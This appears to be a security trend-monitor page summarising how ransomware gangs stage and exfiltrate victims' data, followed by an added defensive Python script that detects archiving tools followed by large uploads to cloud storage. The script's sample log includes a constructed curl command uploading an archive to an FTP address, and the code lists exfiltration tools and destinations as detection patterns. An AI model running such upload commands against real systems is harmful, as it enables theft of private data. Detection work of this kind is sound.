Trends in Security Information
The HSD Trendmonitor is designed to provide access to relevant content on various subjects in the safety and security domain, to identify relevant developments and to connect knowledge and organisations. The safety and security domain encompasses a vast number of subjects. Four relevant taxonomies (type of threat or opportunity, victim, source of threat and domain of application) have been constructed in order to visualize all of these subjects. The taxonomies and related category descriptions have been carefully composed according to other taxonomies, European and international standards and our own expertise.
In order to identify safety and security related trends, relevant reports and HSD news articles are continuously scanned, analysed and classified by hand according to the four taxonomies. This results in a wide array of observations, which we call ‘Trend Snippets’. Multiple Trend Snippets combined can provide insights into safety and security trends. The size of the circles shows the relative weight of the topic, and the filters can be used to further select the most relevant content for you. If you have an addition, question or remark, drop us a line at info@securitydelta.nl.
Data theft creates a secondary extortion market
Until this year, conventional wisdom among security companies that had any experience at all with ransomware ran quite uniformly: lock down obvious ingress methods, such as internet-facing RDP ports; keep good offline backups; and deal with infections of small, innocuous malware such as Dridex or Emotet quickly, before they can deliver the killing payload. Several high-profile ransom attacks, for instance against school districts across the US, failed at least in part because the IT managers had maintained an unaffected backup of critical data. As a countermeasure to their victims’ preparedness, several ransomware families picked up on a side hustle designed to increase pressure on their victims to pay the ransom – even if every backup with essential data was safe. Not only would they hold the machines hostage, but they would steal the data on those machines and threaten to release it to the world if the targets fail to pay a bounty.

Over the past half year, Sophos analysts observed that ransomware adversaries have settled on a common (and slowly growing) toolset they use to exfiltrate data from a victim’s network. This toolset of well-known, legitimate utilities anyone might have won’t be detected by endpoint security products. The list of ransomware families that engage in this practice continues to grow, and now includes Doppelpaymer, REvil, Clop, DarkSide, Netwalker, Ragnar Locker, and Conti, among many others. The attackers operate “leaks” sites, where they publicize what data they’ve stolen; REvil allows anyone to buy the data from them right from its website.
The criminals use the toolset to copy sensitive internal information, compress it into an archive, and transfer it out of the network – and out of reach of the victim. These are some of the tools we’ve seen used, so far:

- Total Commander (file manager with built-in FTP client)
- 7zip (archive creation software)
- WinRAR (archive creation software)
- psftp (PuTTY’s SFTP client)
- Windows cURL

When it comes to data theft, the attackers are far less picky and exfiltrate entire folders, regardless of the file types that are contained within. (Ransomware typically prioritizes the encryption portion of the attack to key file types and excludes many others.) Size doesn’t matter. They don’t seem to care about the amount of data targeted for exfiltration. Directory structures are unique to each business, and some file types can be compressed better than others. We have seen as little as 5 GB, and as much as 400 GB, of compressed data being stolen from a victim prior to deployment of the ransomware.
The criminals typically send the exfiltrated data to legitimate cloud storage services, which make this activity harder to spot, since these are common, ordinary network traffic destinations. For attackers, the following three cloud storage services have been the most popular go-to for storing exfiltrated data:

- Google Drive
- Amazon S3 (Simple Storage Service)
- Mega.nz
- Private FTP servers

In a final act of destruction, ransomware attackers increasingly hunt for the local servers that contain backups of critical data; when found, they delete (or independently encrypt) these backups just before the network-wide encryption attack. It’s more important than ever to store a backup of key data offline. If they can find it, the ransomware criminals will destroy it.
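The two lists above (the archiving and transfer utilities, and the cloud storage and FTP destinations) are individually unremarkable, which is why the snippet says endpoint products do not flag them. What a defender can alert on is the sequence: an archiver or transfer tool launched on a host, followed within a short window by a large volume of outbound data to one of those destinations. The script below is an added example, not code from HSD or Sophos; it correlates those two signals over a handful of constructed process and network log lines. The pipe-separated log format, the process image names, the destination hostnames, the port numbers used to recognise FTP/SFTP, and the 1 GiB / 2 hour thresholds are all assumptions chosen for the demo and would be tuned to a real environment's telemetry.

```python
"""Correlate 'staging tool launched' with 'large outbound transfer to storage service'.

Added example for the HSD trend snippet; not part of the original text or any
vendor product. Log format, hostnames, process names and thresholds are assumed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Utilities the snippet lists as the common exfiltration toolset.
# Image names are assumptions (Total Commander, 7zip, WinRAR, psftp, curl).
STAGING_TOOLS = {"totalcmd.exe", "7z.exe", "winrar.exe", "rar.exe", "psftp.exe", "curl.exe"}

# Destinations the snippet names; the exact hostnames to match are assumptions.
CLOUD_STORAGE_DOMAINS = ("drive.google.com", "googleapis.com",
                         "s3.amazonaws.com", "mega.nz", "mega.co.nz")
# "Private FTP servers": matched by destination port (21 = FTP, 22 = SFTP as used by psftp).
FTP_PORTS = {"21", "22"}

# Policy thresholds, not figures from the page: alert when >= 1 GiB leaves within 2 hours.
EXFIL_BYTES_THRESHOLD = 1 * 1024 ** 3
WINDOW = timedelta(hours=2)

# Constructed sample telemetry: "timestamp|kind|host|field3|field4"
#   kind=proc -> field3 = image name,   field4 = command line
#   kind=net  -> field3 = dest host:port, field4 = bytes sent
SAMPLE_LOG = r"""
2021-05-03T01:12:04|proc|FILESRV01|7z.exe|7z a -mx9 C:\staging\finance.7z D:\shares\finance
2021-05-03T01:40:19|proc|FILESRV01|curl.exe|curl -T C:\staging\finance.7z ftp://203.0.113.10/
2021-05-03T01:41:02|net|FILESRV01|mega.nz:443|1288490188
2021-05-03T02:05:44|net|FILESRV01|s3.amazonaws.com:443|805306368
2021-05-03T09:00:01|proc|WS-ACCT-07|winrar.exe|winrar a weekly-report.rar report.docx
2021-05-03T09:02:10|net|WS-ACCT-07|drive.google.com:443|2097152
2021-05-03T09:30:00|net|DC01|s3.amazonaws.com:443|4294967296
"""


def parse_line(line):
    """Split one constructed log line into a dict; timestamps are ISO 8601."""
    ts, kind, host, f3, f4 = line.rstrip("\n").split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "kind": kind, "host": host, "f3": f3, "f4": f4}


def is_storage_destination(dest):
    """True if dest ('host:port' or bare host) is a listed storage domain or an FTP/SFTP port."""
    host, _, port = dest.lower().rpartition(":")
    if not host:                      # no port present: rpartition put the host in 'port'
        host, port = port, ""
    return host.endswith(CLOUD_STORAGE_DOMAINS) or port in FTP_PORTS


def find_exfil_candidates(lines):
    """Return {host: finding} for hosts where a staging tool ran and, within WINDOW
    afterwards, outbound bytes to storage destinations reached the threshold."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    tool_runs = defaultdict(list)     # host -> [launch timestamps]
    transfers = defaultdict(list)     # host -> [(ts, destination, bytes)]
    for e in events:
        if e["kind"] == "proc" and e["f3"].lower() in STAGING_TOOLS:
            tool_runs[e["host"]].append(e["ts"])
        elif e["kind"] == "net" and is_storage_destination(e["f3"]):
            transfers[e["host"]].append((e["ts"], e["f3"], int(e["f4"])))

    findings = {}
    for host, runs in tool_runs.items():
        for run_ts in runs:
            in_window = [t for t in transfers[host] if run_ts <= t[0] <= run_ts + WINDOW]
            total = sum(b for _, _, b in in_window)
            if total >= EXFIL_BYTES_THRESHOLD:
                findings[host] = {"tool_at": run_ts, "bytes": total,
                                  "destinations": sorted({d for _, d, _ in in_window})}
                break                 # one finding per host is enough for an alert
    return findings


if __name__ == "__main__":
    for host, f in find_exfil_candidates(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: staging tool at {f['tool_at']}, "
              f"{f['bytes'] / 1024 ** 3:.2f} GiB to {', '.join(f['destinations'])}")
```

On the sample data only FILESRV01 is reported: 7-Zip ran and about 2 GiB then went to Mega.nz and S3 within the window. WS-ACCT-07 ran WinRAR but sent only 2 MiB to Google Drive, so it stays below threshold, and DC01 sent 4 GiB to S3 with no staging tool on record, so it is not correlated here; a real deployment would typically keep a separate volume-only rule for that case, since the archiver may run on a different host than the one doing the upload.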